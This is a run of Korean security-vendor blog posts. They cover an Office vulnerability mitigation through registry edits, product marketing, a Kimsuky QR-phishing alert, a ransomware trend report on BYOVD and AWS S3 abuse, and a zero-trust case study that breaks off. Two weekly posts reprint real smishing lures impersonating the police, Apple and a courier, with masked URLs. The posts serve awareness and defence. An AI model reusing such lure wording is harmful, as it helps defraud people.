Office 2019 (32/64-bit)	보안 패치 적용	빌드 16.0.10417.20095 이상 업데이트	2026.01.26 보안 업데이트
Office 2016 (32/64-bit)	보안 패치 적용	빌드 16.0.5539.1001 이상 업데이트	2026.01.26 보안 업데이트

완화 조치

보안 패치를 즉시 적용하기 어려운 경우, 레지스트리 수정을 통해 취약한 COM/OLE 컨트롤을 차단하는 완화 조치를 시행할 수 있습니다.

※ 주의: 레지스트리를 잘못 수정하면 시스템에 심각한 문제가 발생할 수 있으므로 작업 전 반드시 백업을 권장드립니다.

1. Office 종료 및 레지스트리 편집기 실행

1) 모든 MS Office 프로그램을 종료합니다.

2) Win + R 키를 누르고 regedit를 입력하여 레지스트리편집기를 실행합니다.

2. 경로 찾아가기

사용하는 Office 설치 방식(64비트/32비트 등)에 맞는 경로를 찾아갑니다.

64비트 경로: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Common\COM Compatibility\
32비트 경로 (for 32-bit MSI Office on 64-bit Windows): HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Common\COM Compatibility\
간편 실행(ClickToRun) 경로: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Office\16.0\Common\COM Compatibility\
간편 실행(ClickToRun) 경로 (for 32-bit Click2Run Office on 64-bit Windows): HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Office\16.0\Common\COM Compatibility\

(COM Compatibility 키가 없다면 상위 키에서 마우스 우클릭 후 [새로 만들기 > 키]로 생성합니다.)

3. 차단 값 추가

생성할 키 이름: {EAB22AC3-30C1-11CF-A7EB-0000C05BAE0B}
값 이름: Compatibility Flags
값 데이터: 400 (16진수)

1) COM Compatibility 키 아래에 '{EAB22AC3-30C1-11CF-A7EB-0000C05BAE0B}' 라는 이름의 새 키를 생성합니다.

2) 생성한 키에서 마우스 우클릭 [새로 만들기 > DWORD(32비트) 값]을 클릭합니다.

3) 생성된 값의 이름은 Compatibility Flags로 지정하고, 해당 값을 더블 클릭하여 값 데이터에 400 (16진수)을 입력하고 확인을 클릭합니다.

4. 레지스트리편집기를 종료하고 Office를 재실행합니다.

참고:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21509

https://www.cve.org/CVERecord?id=CVE-2026-21509

https://nvd.nist.gov/vuln/detail/CVE-2026-21509

문서보안, 이제는 ‘관리’가 아니라 ‘통제’의 문제입니다

알약5 — Mon, 26 Jan 2026 09:09:59 +0900

by 이스트시큐리티 마케팅팀

안녕하세요, 이스트시큐리티입니다.

문서 유출 사고는 더 이상 일부 기업만의 이야기가 아닙니다. 퇴사 예정 직원의 자료 반출, 재택근무 중 개인 PC에 저장된 업무 문서 유출, 랜섬웨어 감염으로 인한 전사 자료 암호화까지. 최근 발생하는 문서 보안 사고의 상당수는 외부 해커가 아닌 조직 내부의 관리 구조에서 시작되고 있습니다.

왜 문서보안 사고는 반복될까요?

많은 기업이 이미 보안 솔루션을 도입했음에도 불구하고 사고가 반복되는 이유는 명확합니다. 문서를 보호하려 했을 뿐, 문서를 통제하는 구조를 만들지 못했기 때문입니다.

아직도 다음과 같은 방식으로 문서를 관리하고 있다면, 보안 사고 가능성은 언제든 현실이 될 수 있습니다.

개인 PC에 업무 문서 저장
파일 서버·NAS 중심의 단순 공유
메신저·이메일·웹하드를 통한 자료 전달
반출은 사용자 판단에 의존

이러한 환경에서는 문서가 어디에 저장되어 있는지 파악하기 어렵고, 누가 어떤 파일을 복사하거나 외부로 전달했는지 추적하기도 쉽지 않습니다. 접근 권한을 설정했다 하더라도 캡처, 출력, 복사, 외부 첨부와 같은 실제 유출 행위까지 통제하기에는 구조적인 한계가 존재합니다.

기존 문서 관리 방식의 한계

문서가 개인 PC와 여러 저장소에 분산되어 있을수록, 보안 리스크는 기하급수적으로 커집니다.

문서 위치 파악 불가 → 관리 사각지대 발생
반출·복사·캡처 이력 추적 어려움
랜섬웨어 감염 시 전사 확산 위험
ISMS·보안 감사 대응 시 로그 부족

특히 랜섬웨어 공격은 단 한 번의 감염으로 파일 서버와 개인 PC 전체를 동시에 위협할 수 있어, 분산된 문서 관리 환경에서는 피해 복구조차 쉽지 않습니다.

문서보안의 기준이 바뀌고 있습니다

이제 문서보안은 단순한 암호화나 접근 제한의 문제가 아닙니다.

‘누가 열 수 있는가’보다 ‘어디에 저장되고, 어떻게 사용되는가’를 관리하는 단계로 진화하고 있습니다.

여기서 핵심이 되는 개념이 바로 문서중앙화(Document Centralization)입니다.

문서중앙화란 무엇이 다를까요?

문서중앙화 기반 보안 환경에서는 모든 업무 문서를 개인 PC가 아닌 중앙 서버에 저장합니다. 사용자는 기존과 동일한 윈도우 탐색기 환경에서 문서를 열고 편집하지만, 데이터는 기업의 통제 영역 안에서만 관리됩니다.

이를 통해 다음과 같은 보안 구조를 구현할 수 있습니다.

사용자 PC로의 문서 저장 원천 차단
USB·웹메일·메신저·웹하드 등 외부 반출 통제
프로그램·확장자·행위 단위의 세밀한 제어
문서 생성·열람·수정·이동 전 과정 로그 관리

즉, 사고가 발생한 이후 대응하는 방식이 아니라 사고가 발생할 수 없는 구조를 만드는 것이 문서중앙화의 핵심입니다.

보안을 강화하면 업무가 불편해질까요?

문서보안에서 자주 나오는 우려 중 하나는 ‘업무 효율 저하’입니다. 하지만 실제로는 반대의 결과를 가져오는 경우가 많습니다.

문서중앙화 환경에서는 아래와 같은 것들이 가능해 보안과 협업 효율을 동시에 확보할 수 있습니다.

부서별·프로젝트별 협업 공간 구성
승인 기반 반출 프로세스를 통한 안전한 외부 공유
문서 버전 관리 및 이력 자동 저장
사용자 실수·랜섬웨어 발생 시 빠른 복구

보안을 이유로 불편해진 환경은 오히려 비인가 공유와 우회 경로를 만들지만, 통제된 협업 구조는 자연스럽게 보안 수준을 끌어올립니다.

문서중앙화 기반 문서보안, 이렇게 구현됩니다

문서중앙화가 실제 보안 환경에서 어떻게 작동하는지 궁금하신 분들을 위해, 이스트시큐리티의 문서중앙화 기반 문서보안 솔루션 시큐어디스크가 제공하는 핵심 특장점을 중심으로 살펴보겠습니다.

시큐어디스크 특장점

시큐어디스크는 문서중앙화를 통해 내부자료 유출.유실 방지 및 통합관리가 가능한 차세대 문서 보안솔루션입니다.

[이미지] 시큐어디스크

① 내부 자료 유출, 구조적으로 차단

시큐어디스크는 사용자가 생성하거나 수정하는 모든 업무 문서를 자동으로 중앙 서버로 이관·저장합니다. 개인 PC에는 문서 원본이 남지 않도록 설계되어 있어, 퇴사·이직·실수 등 내부 요인으로 인한 자료 유출 가능성을 근본적으로 제거합니다. USB, 외장 저장매체 등 로컬 저장을 차단함으로써 “사용자 판단에 맡기는 보안”에서 벗어난 구조적 통제가 가능합니다.

② 서버·전송 구간 암호화로 데이터 보호 강화

문서보안은 저장 위치뿐 아니라 이동 경로까지 함께 보호되어야 합니다. 시큐어디스크는 전송 구간과 서버 저장 영역 모두 암호화를 적용해, 네트워크 도청이나 물리적 디스크 유출, 해킹 시도에 의한 데이터 탈취 위험을 최소화합니다. 중앙 서버에 문서를 모아두더라도 보안 수준이 낮아지지 않도록 설계된 구조입니다.

③ 랜섬웨어·실수에도 대비하는 문서 버전 관리

랜섬웨어 감염이나 사용자 실수로 인한 파일 변경·삭제는 문서 유실로 직결되기 쉽습니다. 시큐어디스크는 모든 문서를 버전 단위로 자동 관리해, 특정 시점 이전 상태로 손쉽게 복원할 수 있습니다. 이는 사고 발생 이후의 대응이 아니라, 사고를 전제로 한 실질적인 복구 전략을 가능하게 합니다.

④ 조직 구조에 맞춘 협업 디스크 구성

보안이 강화될수록 협업이 불편해진다는 인식을 바꾸는 지점이 바로 협업 디스크 설계입니다. 시큐어디스크는 인사 DB와 연동된 조직도 기반 디스크를 생성해 부서별 문서 관리와 권한 설정을 자동화할 수 있으며, 필요에 따라 프로젝트 단위의 협업 디스크를 유연하게 구성할 수 있습니다. 이를 통해 보안 통제와 업무 효율을 동시에 만족시키는 협업 환경을 구현합니다.

이처럼 시큐어디스크는 단순히 문서를 한 곳에 모아두는 솔루션이 아니라, 저장 → 사용 → 공유 → 복구까지 문서 생명주기 전체를 통제하는 구조를 제공합니다. 문서보안을 ‘추가 기능’이 아닌 ‘업무 인프라의 기본 조건’으로 가져가고자 하는 조직이라면, 문서중앙화 기반 접근을 진지하게 고려해볼 필요가 있습니다.

문서보안, 이제는 ‘구조’를 점검할 때입니다

결국 문서보안의 본질은 문서를 잠그는 것이 아니라, 문서를 기업의 자산으로 관리하는 구조를 만드는 것입니다.

문서가 여전히 개인 PC와 개인 판단에 맡겨져 있다면, 보안은 언제든지 우연에 의존할 수밖에 없습니다. 지금 우리 조직의 문서 관리 방식이 사고를 예방하는 구조인지, 아니면 사고가 나지 않기를 바라고 있는 상태인지 점검해야 할 시점입니다.

이스트시큐리티는 문서중앙화 기반 문서보안 환경을 통해 내부 정보 유출과 랜섬웨어 위협으로부터 기업의 핵심 자산을 보호할 수 있는 현실적인 대안을 제시합니다.

문서보안, 이제는 관리가 아니라 통제의 문제입니다.

기업 문서 자산을 근본적으로 보호하는 방법을 고민하고 계시다면, 지금의 문서 관리 구조부터 다시 살펴보시기 바랍니다.

[국제발신] CJ : 추가 비용으로 인해 배송이 중단되었습니다. cj-l****ics.vip을 방문해 주세요.

알약4 — Fri, 23 Jan 2026 10:55:50 +0900

[1월 넷째주]

No.	문자내용
1	[경찰청(이파인)] 귀하께(신호미준수)사실확인되어 과태료부과내용이 발송되었습니다. hxxps://mz.***k.hair
2	[국외발신][Apple] 귀하의 계정이 다른 위치에서 로그인되었습니다. 즉시 확인해 주세요. kr-****ne.com
3	[국제발신] CJ : 추가 비용으로 인해 배송이 중단되었습니다. cj-l****ics.vip을 방문해 주세요.

출처 : 알약M
기간 : 2026년 1월 17일 ~ 2025년 1월 23일

이메일보다 교묘하다! QR 코드로 침투하는 신종 피싱 ‘퀴싱’

알약5 — Tue, 20 Jan 2026 16:42:12 +0900

by 이스트시큐리티 마케팅팀

안녕하세요, 이스트시큐리티입니다.

최근 미국 FBI가 북한의 국가 배후 해킹 조직 김수키(Kimsuky)가 악성 QR 코드를 활용한 새로운 형태의 스피어피싱, 이른바 ‘퀴싱(Quishing)’ 공격을 전개하고 있다며 긴급 경고를 발표했습니다. QR 코드라는 일상적인 도구가, 이제는 국가 배후 APT 공격의 핵심 침투 수단으로 활용되고 있다는 점에서 기업과 기관 모두 각별한 주의가 필요합니다.

QR 코드로 시작되는 정교한 침투 시나리오

이번에 확인된 퀴싱 공격의 가장 큰 특징은 공격의 출발점이 ‘개인 모바일 기기’라는 점입니다. 김수키 조직은 기업 보안 정책이 적용된 업무용 PC가 아닌, 상대적으로 보안 통제가 느슨한 개인 스마트폰을 노렸습니다.

이들은 싱크탱크, 학술기관, 정부기관 관계자를 정밀 타깃으로 삼아 설문조사 요청, 가짜 컨퍼런스 초청, 보안 드라이브 접근 안내 등 그럴듯한 명분을 내세운 이메일을 발송했고, 이메일에는 자연스럽게 QR 코드가 삽입돼 있었습니다.

문제는 이 이메일이 단순한 피싱 메일이 아니라는 점입니다. 공격자들은 DMARC 정책 설정 오류를 악용해, 실제 신뢰 가능한 기관에서 발송된 것처럼 보이도록 이메일을 위장했습니다. 사용자가 아무 의심 없이 QR 코드를 스캔하는 순간, 공격자는 이미 다음 단계로 넘어가게 됩니다.

모바일에서 시작해 계정 탈취까지, MFA도 우회된다

QR 코드를 스캔하면 사용자는 공격자가 통제하는 피싱 사이트로 이동하게 되며, 이 과정에서 구글 계정 등 업무와 연동된 자격 증명이 탈취됩니다. 최근에는 국내 서울 소재 물류 회사를 사칭해 '닥스왑(DocSwap)’으로 불리는 새로운 안드로이드 악성코드를 유포한 정황도 포착됐습니다.

이 악성 앱은 단말 정보, 문자 메시지, 사진 등 민감한 정보를 탈취할 수 있으며, 더 큰 문제는 세션 토큰 탈취를 통해 다요소인증(MFA)까지 우회할 수 있다는 점입니다.

탈취된 계정은 여기서 끝나지 않습니다. 공격자는 해당 계정을 발판 삼아 조직 내부를 대상으로 한 2차 스피어피싱을 확산시키고, 결과적으로 피해 범위를 기하급수적으로 확대합니다. 이 모든 과정이 기업의 EDR이나 네트워크 보안 관제 범위 밖인 개인 모바일 기기에서 시작된다는 점이, 방어자 입장에서는 치명적인 허점으로 작용합니다.

‘편의성’이 만든 새로운 보안 사각지대

FBI는 이번 사례를 두고, 퀴싱이 이제 기업 환경에서 MFA를 무력화할 수 있는 고신뢰 침투 벡터로 자리 잡았다고 분석했습니다. 기술적 취약점보다 인간의 심리, 그리고 모바일 보안에 대한 방심을 정교하게 파고든 공격이라는 평가입니다.

QR 코드는 더 이상 단순한 편의 도구가 아닙니다. 클릭 한 번, 스캔 한 번이 곧 조직 전체 계정과 클라우드 자산을 넘겨주는 출발점이 될 수 있습니다.

기업과 사용자가 반드시 점검해야 할 대응 포인트

이번 공격이 시사하는 바는 분명합니다. 보안의 경계는 이미 PC를 넘어 모바일로 확장됐습니다.

☑︎ 출처가 불분명한 이메일·메시지에 포함된 QR 코드는 절대 스캔하지 않기
☑︎ QR 코드로 유도되는 앱 설치, 로그인 요청에 대한 경각심 강화
☑︎ 조직 차원의 모바일 기기 관리(MDM) 정책 강화
☑︎ 임직원 대상 퀴싱·큐싱 등 최신 피싱 기법 교육 정례화
☑︎ 모바일까지 포함한 전사적 가시성과 실시간 위협 모니터링 체계 재정비

북한 김수키 조직의 공세는 2026년에도 더욱 지능화된 형태로 이어질 가능성이 높습니다. 결국 이번 사건은, 우리가 무심코 사용하는 QR 코드 하나가 국가 배후 해커에게는 강력한 사이버 무기로 변모할 수 있음을 명확히 보여주고 있습니다. 보안의 사각지대를 방치한다면, 기업의 핵심 데이터 주권 역시 언제든 위협받을 수 있습니다.

QR 코드 하나로 시작된 이번 퀴싱 공격 사례는, 보안 위협이 더 이상 특정 시스템이나 기술 영역에 국한되지 않는다는 사실을 다시 한 번 상기시킵니다. 특히 개인 모바일 기기를 기점으로 다요소인증(MFA)까지 우회하는 공격이 현실화된 지금, ‘조심하면 된다’는 인식만으로는 더 이상 충분하지 않습니다.

출처가 불분명한 QR 코드 스캔을 경계하는 개인 차원의 주의는 물론, 조직 차원에서도 모바일 기기까지 포함한 보안 정책 점검과 임직원 보안 인식 제고가 반드시 병행돼야 할 시점입니다. 일상의 편의성을 노린 공격일수록 피해는 더 치명적일 수 있다는 점을 인지하고, 작은 행동 하나에도 각별한 보안 주의가 요구됩니다.

[경찰청민원24] 과태료청구서가 전달되었습니다. hxxps://poa.***g[.]my

알약4 — Fri, 16 Jan 2026 14:08:01 +0900

[1월 셋째주]

No.	문자내용
1	[경찰청민원24] 과태료청구서가 전달되었습니다. hxxps://poa.***g[.]my
2	[경찰청민원24] 과태료청구서가 발부되었습니다. https://moa.n***.my
3	[경찰청24] 귀하에게 고지서가 발부되었습니다. 고지서내용 열람바랍니다. https://yoa.***n.mobi

출처 : 알약M
기간 : 2026년 1월 10일 ~ 2025년 1월 16일

2025년 4분기 알약 랜섬웨어 행위기반 차단 건수 총 59,162건!

알약4 — Thu, 15 Jan 2026 14:59:38 +0900

안녕하세요!  이스트시큐리티 시큐리티 대응센터(ESRC)입니다.    

2025년 4분기 자사 백신 프로그램 ‘알약’에 탑재되어 있는 ‘랜섬웨어 행위기반 사전 차단’ 기능을 통해 총59,162건의 랜섬웨어 공격을 차단했으며, 이를 일간 기준으로 환산하면 일 평균 643건의 랜섬웨어 공격을 차단한 것으로 볼 수 있습니다.      

이번 통계는 개인 사용자를 대상으로 무료 제공하는 공개용 알약 백신프로그램의 ‘랜섬웨어 행위기반 사전 차단 기능’을 통해 차단된 공격만을 집계한 결과입니다.  

다음은 ESRC에서 선정한 2025년 4분기 주요 랜섬웨어 동향입니다.   

1) BYOVD 기법을 활용한 랜섬웨어 공격 주의
2) 클라우드 인프라와 AWS S3 스토리지, 새로운 공격 대상으로 부상
3) LockBit 5.0의 등장
4) 랜섬웨어 조직들의 전략적 동맹
5) Akira 랜섬웨어 변종 복호화 툴 공개

랜섬웨어의 공격조직들이 BYOVD(Bring Your Own Vulnerable Driver) 기법을 사용하여 보안 솔루션을 종료하거나 무력화 시키고 있어 주의가 필요합니다.

BYOVD(Bring Your Own Vulnerable Driver)는 합법적 서명을 포함하고 있지만 취약점이 존재하는 드라이버를 공격에 활용하는 공격 기법으로, 공격자가 공격에 성공하면 커널 수준의 권한상승이 가능하여 시스템에 대한 최고 수준의 접근 및 제어권한을 확보할 수 있습니다.

Qilin 랜섬웨어 공격자들은 BYOVD 공격을 위해 2015년에 컴파일 및 서명된 취약한 Windows 커널 드라이버 TPwSav.sys를 공격 툴에 추가하였으며, DeadLock 랜섬웨어는 CVE-2024-51324 취약점이 존재하는 Baidu 백신 드라이버인 BdApiUtil.sys를 공격에 활용하여 Baidu EDR을 비활성화 하고 이후 권한상승, 보안 및 백업 시스템 및 섀도우 복사본을 삭제하는 파워쉘 스크립트를 실행하기도 했습니다. BYOVD 기법을 활용한 공격 사례는 2026년에도 지속될 것으로 예상됩니다.

기업들의 운영환경이 클라우드로 이전됨에 따라, 랜섬웨어의 공격 타깃도 Amazon S3와 같은 클라우드 스토리지로 확대되고 있습니다.

2025년 1월, AWS의 고객제공키(SSE-C) 기능을 악용하여 데이터를 암호화 하는 CodeFinger랜섬웨어가 발견되었습니다.

SSE-C는 AWS S3 환경에서 고객이 직접 암호키 생성, 데이터 암호화 하는 방식으로, 암호화키를 고객만 보유하고 있기 때문에 데이터에 대한 데이터의 소유와 관리를 모두 직접 진행할 수 있습니다. 공격자는 다양한 경로로 AWS접속에 필요한 액세스 키나 계정정보를 찾아 접속권한을 획득하며, 접속성공 후 SSE-C 기능을 악용하여 고객 데이터를 암호화 한 후 복호화를 위한 대칭형 AES-256키를 제공하는 대가로 금전을 요구합니다.

11월에는 TrendMicro는 잠재적으로 랜섬웨어가 AWS S3에 저장된 사용자 데이터를 공격할 수 있는 기술들에 대한 보고서를 공개했습니다. 이 보고서를 통해 기본 관리형 키 악용 (Default AWS KMS Keys), 고객 제공 키 악용 (SSE-C), 데이터 유출 후 삭제 (Exfiltration and Deletion), 외부 키 재료 주입 (External Key Material Import), 외부 키 스토어 활용 (External Key Store, XKS) 등 실제 공격에 활용될 수 있는 5가지 방법들에 대해 상세히 기술하였으며, 클라우드 인프라 역시 더 이상 랜섬웨어의 안전지대가 아님을 경고하였습니다.

LockBit 5.0이 등장하였습니다.

LockBit 랜섬웨어 그룹은 2024년 초, 국제 수사 집행기관들이 함께 협력하여 진행한 Operation Cronos 작전으로 인해 그룹의 인프라 상당부분이 타격을 입고 영향력이 크게 약화되며 활동이 중단된 듯 하였습니다. 하지만 2025년 9월 초, LockBit은 공식적으로 복귀를 발표하며 화려하게 귀환하였습니다.

LockBit 5.0 버전은 Windows, Linux 및 ESXi 서버를 주요 공격 대상으로 삼습니다. 파일 암호화 완료 후 무작위로 생성된 16자리의 확장자를 추가하는 것이 특징이며, 기존 암호화 파일 뒤에 붙이던 .lockbit과 같은 고유 마커를 의도적으로 삭제하여 흔적을 지움으로써 보안 솔루션의 탐지와 초기 대응을 어렵게 만듭니다. 또한 기존 분산형 토르(Tor) 인프라와 P2P 기반 암호화 메신저인 Tox IDs를 추가 도입하여, 수사기관 차단을 대비해 협상 및 통신이 더욱 용이할 수 있도록 업그레이드 되었습니다. LockBit 5.0은 이미 수십명의 피해자를 발생시켰으며, 활발한 공격 활동을 이어나갈 것으로 전망됩니다.

2025년 10월, LockBit, Qilin, DragonForce 랜섬웨어 조직들이 전략적 동맹을 발표했습니다.

전략적 동맹을 통해 랜섬웨어는 더 이상 단일 조직으로 분류되는 것이 아닌, 혼합된 전술을 사용하고 서로의 인프라를 상호 공유하는 분산형 랜섬웨어 공급망 구조로 진화하였습니다. 또한 '오퍼레이션 크로노스(Operation Cronos)'와 같은 국제적 인프라 타격 작전 이후에도 공격을 지속할 수 있는 높은 회복 탄력성도 갖추게 되었습니다. 이러한 변화에 따라 2026년에는 랜섬웨어 조직들의 활동이 더욱 활발해지고, 공격의 범위와 파급력 또한 한층 확대될 것으로 전망됩니다.

Akira 랜섬웨어 변종 복호화 툴이 공개되었습니다.

리눅스 및 ESXi 서버를 대상으로 한 Akira 랜섬웨어 변종이 파일별 고유 암호화 키를 생성하는 과정에서 무작위 값이 아닌 시스템의 나노초 단위 타임스탬프를 시드값으로 사용한다는 점이 확인되었습니다. 이러한 키 생성 방식의 취약점으로 인해 NVIDIA GPU의 대규모 병렬 처리 성능을 활용한 초당 수십억 개의 시드값 대입이 가능해 졌으며, 브루트포스 방식으로 복호화키를 추측할 수 있게 되었습니다. 그 결과 복호화 툴이 성공적으로 개발되었습니다. 해당 작업은 일반적인 CPU를 활용하면 수 년이 소요되는 수준이었습니다.

이번 복호화 툴의 개발은 최신 하드웨어 기술을 활용하여 랜섬웨어 공격자의 암호화 전략을 무력화 했다는 점에서 큰 의미가 있으며, 최신 컴퓨팅 자원을 전략적으로 활용하여 지능적 위협에 대응할 수 있다는 점을 입증한 사례로 평가받고 있습니다.

랜섬웨어는 특정 조직에 국한되지 않는 분산된 공급망 형태로 진화중에 있으며, 전방위적인 공격 타깃 확장과 더불어 지능화된 기술을 통해 기존 방어 체계를 위협하고 있습니다. 이에 보안담당자 여러분들께서는 조직 자산에 대한 접근 권한 관리를 강화하고 오프라인 백업 체계 구축을 통해 진화하는 랜섬웨어 위협으로부터 피해를 최소화할 수 있도록 대비해야 하겠습니다.

기업의 랜섬웨어 대응 전략의 변화: ‘지불’에서 ‘ASM(공격표면관리)’로!

알약5 — Wed, 14 Jan 2026 16:12:40 +0900

by 이스트시큐리티 마케팅팀

안녕하세요, 이스트시큐리티입니다.

랜섬웨어 공격을 당했을 때 '몸값만 지불하면 데이터는 되찾을 수 있다'는 인식은 이제 더 이상 유효하지 않습니다. 글로벌 보안 조사 기업 CyberEdge Group이 발표한 2025년 사이버 위협 방어 보고서에 따르면, 랜섬웨어 몸값을 지불한 기업 중 실제로 데이터를 복구한 비율은 54.3%에 그쳤습니다. 이는 불과 2년 전인 2023년의 72.7%에서 급격히 하락한 수치입니다.

이 결과는 하나의 분명한 사실을 보여줍니다.

랜섬웨어 공격자에게 ‘지불’은 더 이상 해결책이 아니라, 불확실한 선택지가 되었다는 점입니다.

변화한 보안 표준 - '조공은 없다'

보고서는 최근 기업 보안 정책의 변화도 함께 짚고 있습니다. 점점 더 많은 조직이 '단 1센트도 지불하지 않는다(Millions for defense, but not one cent for tribute)'는 원칙을 채택하고 있습니다.

그 배경에는 명확한 이유가 있습니다.

첫째, 복호화 도구의 품질과 신뢰도가 급격히 낮아졌습니다.
몸값을 지불해도 정상적인 복호화가 되지 않거나, 일부 데이터만 복구되는 사례가 빈번하게 보고되고 있습니다.

둘째, 데이터 비공개 약속이 지켜지지 않는 경우가 늘고 있습니다.
지불 이후에도 탈취된 정보가 다크웹에 유출되거나, 2차 협박으로 이어지는 사례가 증가하고 있습니다.

셋째, 사이버 보험과 규제 환경의 변화입니다.
일부 보험사는 랜섬웨어 몸값 지불을 보장 대상에서 제외하고 있으며, 특정 공격 그룹에 대한 지불을 법적으로 제한하는 국가도 늘고 있습니다.

이제 기업에게 랜섬웨어 대응은 ‘지불 여부’의 문제가 아니라, 사전에 얼마나 대비했는지의 문제로 이동하고 있습니다.

확장되는 공격, 폭발적으로 증가하는 관리 범위

CyberEdge 보고서가 특히 주목한 변화는 공격 표면(Attack Surface)의 급격한 확장입니다. 과거에는 중요한 데이터와 시스템이 사내 서버나 파일 서버에 집중돼 있었다면, 이제는 상황이 완전히 달라졌습니다.

클라우드 서비스와 SaaS 환경
원격 근무를 위한 개인·모바일 기기
외주·협력사 계정과 접근 권한
웹·모바일 애플리케이션과 API
IoT 및 산업용 디바이스

보고서에 따르면, 모바일 및 웹 애플리케이션 취약점은 전체 응답 기업의 90.9%에서 주요 보안 위협 요인으로 작용하고 있으며, 개인정보 탈취·계정 탈취·결제 사기 등 지능형 범죄의 핵심 경로로 악용되고 있습니다.

문제는 이 모든 환경이 한눈에 보이지 않는 상태로 운영되고 있다는 점입니다.

핵심 보안 영역으로 떠오르는 ‘공격 표면 관리(ASM)’

CyberEdge는 2025년 보안 트렌드 중 하나로 ASM(Attack Surface Management)를 명확히 지목합니다. 공격 표면이 커질수록, '무엇을 보호해야 하는지 아는 것'이 가장 중요한 보안 역량이 되기 때문입니다.

ASM은 단순한 취약점 스캔이 아닙니다. 공격자가 실제로 바라보는 관점에서, 조직 외부에 노출된 모든 자산을 식별하고 관리하는 보안 전략입니다. 보고서는 공격 표면이 하나의 거대한 덩어리가 아니라, 성격이 다른 다수의 공격 표면으로 분화되고 있다고 지적합니다. 이 변화에 대응하지 못한다면, 랜섬웨어·계정 탈취·데이터 유출은 언제든 반복될 수 있습니다.

Plus Tip. 공격 표면이 보이지 않으면, 대응도 불가능합니다

이러한 흐름 속에서, 기업이 가장 먼저 점검해야 할 질문은 이것입니다.

“우리 조직은 어디서 공격당할 수 있는가?”

이스트시큐리티의 알약 ASM은 기업 외부에 노출된 공격 표면을 자동으로 식별하고, 실제 위협 가능성이 높은 지점을 우선순위 기반으로 관리할 수 있도록 설계된 공격 표면 관리 솔루션입니다.

알약 ASM은 다음과 같은 영역을 중심으로 가시성을 제공합니다.

외부에 노출된 서버, 도메인, IP, 웹 서비스 자동 탐지
관리되지 않는 섀도 IT 및 오래된 서비스 포인트 식별
취약점·노출 위험도 기반 우선순위 분석
랜섬웨어·계정 탈취·초기 침투 가능 지점 사전 파악

클라우드·SaaS·원격 근무 환경이 일상화된 지금, 사고 이후 대응보다 사전 가시성 확보가 훨씬 현실적인 보안 전략이 되고 있습니다.

랜섬웨어를 '막을 수 있을까' 고민하기 전에, 어디서부터 공격받을 수 있는지 알고 계신가요?

ASM은 이제 선택이 아닌, 랜섬웨어 대응과 보안 프레임워크·사이버 보험 대응을 위한 기본 조건이 되고 있습니다.

지금 우리 조직의 공격 표면은 얼마나 노출되어 있을까요? 알약 ASM으로 기업의 외부 노출 자산을 진단하고, 실제 위협 관점에서 대응 전략을 설계해보세요. 무료 컨설팅 신청하기(Click)

이제 보안 프레임워크는 ‘권고’가 아닌 ‘생존 전략’

보고서는 또 하나의 중요한 변화를 짚고 있습니다.

과거에는 번거롭게 여겨졌던 NIST, CSA(Cloud Control Matrix) 등 보안 프레임워크가 이제는 필수 요건으로 자리 잡고 있다는 점입니다. 사이버 보험 청구 시에도 평소 규정 준수 여부가 핵심 판단 기준이 되고 있으며, 보안 표준을 갖추지 못한 조직은 사고 이후에도 보호받기 어려운 환경에 놓이게 됩니다.

랜섬웨어의 해답은 ‘사전 대응’

랜섬웨어는 더 이상 몸값을 지불해 해결할 수 있는 문제가 아닙니다. 복구 성공률 54.3%라는 수치는 사전 대비 없는 대응이 얼마나 위험한 선택인지를 명확히 보여줍니다. 이제 기업 보안의 중심은 얼마나 빨리 복구하느냐가 아니라 얼마나 공격받지 않도록 준비했는가로 이동하고 있습니다.

공격 표면을 정확히 파악하고, 노출된 지점을 관리하며, 보안 프레임워크 기반의 체계를 갖추는 것.

이것이 2026년 현재, 기업 보안의 현실적인 생존 전략입니다.

연초는 공격자들이 가장 활발하게 움직이는 시기이기도 합니다. 안전한 한 해를 보내기 위해 지금, 우리 조직의 보안 상태를 한 번 더 점검해보시기 바랍니다. 이스트시큐리티는 앞으로도 변화하는 위협 환경 속에서, 기업이 보다 안전하게 한 해를 마무리하고 새로운 해를 맞이할 수 있도록 보안 인사이트와 대응 전략을 지속적으로 제공하겠습니다.

[참고 출처]

TechNewsTT, <Cyberedge reports on cybersecurity trends> 2026.1.12

서비스 고객 도입망, 왜 제로트러스트로 바뀌고 있을까?– 다수 고객 환경에서 달라진 보안 기준

알약5 — Tue, 13 Jan 2026 10:29:09 +0900

by 이스트시큐리티 마케팅팀

안녕하세요, 이스트시큐리티입니다.

SaaS, DaaS, 클라우드 기반 서비스가 확산되면서 기업 IT 환경은 빠르게 변화하고 있습니다. 특히 하나의 인프라에서 다수 고객을 동시에 지원하는 서비스 기업의 경우, 보안 사고 한 번이 곧 신뢰도 하락과 직결되는 구조가 되었습니다.

최근 보안 트렌드가 단순한 ‘외부 침입 차단’에서 사용자 접근과 행위 전반을 통제하는 구조로 이동하는 이유도 여기에 있습니다.

'접속은 막았는데, 그 다음은요?'

- 서비스형 IT 환경이 마주한 새로운 보안 과제

서비스 기업의 IT 환경은 일반 사내망과 다릅니다.

외부 고객, 협력사, 내부 운영 인력이 혼재
클라우드·가상 환경 기반의 상시 접속 구조
사용자 계정 탈취, 단말 감염이 곧 서비스 침해로 이어질 수 있는 환경

기존 VPN이나 단순 인증 중심의 보안 체계는 ‘접속 여부’까지만 통제할 수 있을 뿐, 접속 이후 발생하는 행위와 내부 확산까지는 충분히 관리하기 어려웠습니다.

이러한 한계를 해결하기 위해 B 고객사는 제로트러스트 기반 통합 보안 체계 도입을 검토하게 됩니다.

서비스 고객 도입망에 제로트러스트 통합 보안 체계 구축 사례

B 고객사는 공공기관, 대기업, 중소기업 등 국내 다수 고객을 대상으로 클라우드 기반 서비스를 제공하는 기업입니다. 서비스 특성상 외부 공격이나 계정 탈취 사고 발생 시, 단일 고객을 넘어 다수 고객에게 영향을 미칠 수 있는 구조였으며, 사용자 접근 관리와 서비스 운영 환경 전반에 대한 보안 통제 강화가 주요 과제였습니다.

✅ 도입 배경의 핵심 - 제로트러스트를 '운영 구조'로 구현하다

서비스 고객 도입망 환경에서 사용자 접근 통제 기준 강화 필요
DaaS·가상 환경 전반의 보안 상태를 지속적으로 확인할 수 있는 구조 요구
